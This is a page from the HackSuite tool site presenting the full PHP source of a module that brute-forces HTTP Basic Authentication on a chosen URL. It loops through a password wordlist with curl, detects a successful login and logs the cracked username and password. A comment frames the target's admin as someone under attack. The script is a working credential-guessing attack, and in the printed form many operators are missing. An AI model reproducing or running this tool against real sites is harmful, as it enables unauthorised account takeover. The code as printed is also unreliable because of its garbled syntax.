random gallery image
random tutorial
preview

..show you how to make a multi bridge between THC_DO, THC_SS and THC_II and keep track of the output in realtime using iframes. So what exactly are we going to do? First of all if you..

read more

random stress testing
HackSuite File Library
File Library
Here you can find the latest files and structure of the THC HackSuite, note that if you have an earlier version of the suite it's not recommended to update files manually. Instead you should overwrite your existing HackSuite environment.
<?php
/*
Handler for HTTP Auth

Author: Remco Kouw
Site: http://www.hacksuite.com
Last Edit: 13-04-2015
*/
// set variable to be able to save a task
$_MODULE_C "thc_ht";
$_LOG "accounts.php";
include_once(
"../../Includes/screen_header.php");
include_once(
$_PATHS['style_root']."/screen.php");
include_once(
$_PATHS['functions_root']."/scrn.php");
include_once(
$_PATHS['functions_root']."/fwrite.php");
// options
$sOptions "<b>logging:</b> ".($_CONTEXT['log']==true "on" "off")."<br>\n";
$sOptions .= "<b>silence:</b> ".($_CONTEXT['silent']==true "on" "off")."<br>\n";
$sOptions .= "<b>verbose:</b> ".($_CONTEXT['verbose']==true "on" "off")."\n";
if(isset(
$_POST['submit']) && $_POST['submit']!="Dump Log" && $_POST['submit']!="Clean Log"){
    
// don't you just hate using post variables directly? Uhm I do.. ;)
    
$sUser = ($_POST['sUser']=="" "admin" "");
    
$sScanUrl $_POST['sScanUrl'];
    
$sWordlist $_POST['sWordlist'];
    if(
$_POST['submit']=="Test"){
        
$sScanUrl str_replace("/thc_ht","",$_PATHS['servers_root_http']."/http_authenticate.php");
    }
    
// first of all let's see if the url looks valid..
    
$aUrl parse_url($sScanUrl);
    if(!isset(
$aUrl['host']) || !strlen($aUrl['host'])){
        die(
Screen($sOut."Invalid target specified.".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
    }
    if(
$sWordlist!=""){
        
$sFile ExploitFilter($_PATHS['wordlists_root']."/".$sWordlist,0,1);
        if(!
file_exists($sFile) || !@filesize($sFile)){
            die(
Screen($sOut."Expecting a valid filepath to a non empty wordlist.".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
        }
    }
    else{
        die(
Screen($sOut."Select a wordlist you want to use.".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
    }
    
$aWordlist file($sFile);
    
$iLoops count($aWordlist);
}
if(isset(
$_POST['submit'])){
    
// made this switch for extra future options
    
switch($_POST['submit']){
        
// this will test this script against the test server (TestServer/http_authenticate.php)
        
case"Test":
        
$_POST['submit'] = "Bruteforce";
        
// start task enter
        
case"Bruteforce":
        include_once(
$_PATHS['includes_root']."/task_start.php");
        echo 
$sOut;
        break;
        
// Dump Log
        
case"Dump Log":
        echo 
$sOut;
        if(!
function_exists("RawToArray")){
            include_once(
$_PATHS['functions_root']."/raw_to_array.php");
        }
        if(
false==($aKeys RawToArray($_LOG))){
            echo
"<b id=h7>[no passwords found yet]</b>";
        }
        else{
            for(
$x=0;$x<count($aKeys);$x++){
                echo
"<b>[".$aKeys[$x][0]."]</b> (".date($_CONTEXT['time_pattern'].' H:i:s',$aKeys[$x][1]).") =&gt; (u)".$aKeys[$x][2]." (p) ".$aKeys[$x][3]."<br>\n";
            }
        }
        exit;
        break;
        
// Clean Log
        
case"Clean Log":
        echo 
$sOut;
        echo (
WriteF($_LOG,"","w") ? "Successfully cleaned log" "Failed to clean log");
        echo 
$sEnd;
        exit;
        break;
        
// just show index
        
default:
        echo 
$sOut;
        echo 
$sOptions;
        echo 
$sEnd;
        exit;
    }
}
else{
    echo 
$sOut;
    echo 
$sOptions;
    echo 
$sEnd;
    exit;
}
// okidoki let's prepare the task
echo Screen("<br>\n<b>Running thc_ht @ ".$aUrl['scheme']."://".$aUrl['host'].@$aUrl['path']."</b><br>\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
// spit fire...
flush();
ob_flush();
// keep track of status
$bFound false;
$iPadding strlen($iLoops);
$y 1;
$sRequest "";
// let's get this thing in action
for($x=0,$y=1;$x<$iLoops;$x++,$y++){
    
// make a connection and get the response
    
$ch curl_init();
    
$aWordlist[$x] = trim($aWordlist[$x]);
    
$sRequest $sUser.":".$aWordlist[$x];
    
curl_setopt($chCURLOPT_URL$sScanUrl);
    
curl_setopt($chCURLOPT_USERPWD$sRequest);
    
curl_setopt($chCURLOPT_FOLLOWLOCATION,1);
    
curl_setopt($chCURLOPT_HEADER,1);
    
curl_setopt($chCURLOPT_RETURNTRANSFER,1);
    
$sResponse curl_exec($ch);
    
curl_close($ch);
    
// connection closed.. let's see what we have here..
    
if(preg_match('/404 Not Found/',$sResponse)){
        
// page doesn't exist, it's in the loop just in case the admin takes the page down if he finds out he's under attack
        
echo Screen("<br />\nTarget file doesn't exist!<br />\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
        break;
    }
    
// for markup's sake so the output will look better
    
$iYLen $iPadding-strlen($y);
    
$sAttempt = ($iYLen!=str_repeat("0",$iYLen) : "").$y;
    echo 
Screen("[".$sAttempt."] trying ".$sRequest." =&gt; ",$_CONTEXT['verbose'],$_CONTEXT['silent']);
    if(!
preg_match('/200 OK/',$sResponse)){
        
// no access
        
echo Screen("unauthorized<br>\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
    }
    else{
        
// bingo
        
echo Screen("<b>logged in</b><br>\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
        
$bFound true;
        if(
$_CONTEXT['log']==true){
            
WriteF($_LOG,trim($sScanUrl)."|".time()."|".$sUser."|".$aWordlist[$x]."\n");
        }
        break;
    }
    
flush();
    
ob_flush();
}
echo 
Screen("<p><b>attempts:</b> ".$y." => ".($bFound==true $sRequest "no success")." (running time) ".(time()-$_CONTEXT['start_task'])."(s)\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
// update entry in background task file
include_once($_PATHS['includes_root']."/task_end.php");
echo 
$sEnd;
?>
powered by
site stats
cms statistics:
version: 0.6.0
downloads: 4372
native: 26
modules: 21
apps: 2
support development
It takes lots of calories in order to create new things for the hacksuite, so it would be grand if you could buy me a protein shake or extra energy to keep me going. Thanks!
disclaimer
We are not responsible for any direct or indirect damage caused by abusing the tools provided on hacksuite.com. The suite is developed for educational purposes, use at your own risk!
Created by Remco Kouw. Powered by protein shakes and a high calorie diet.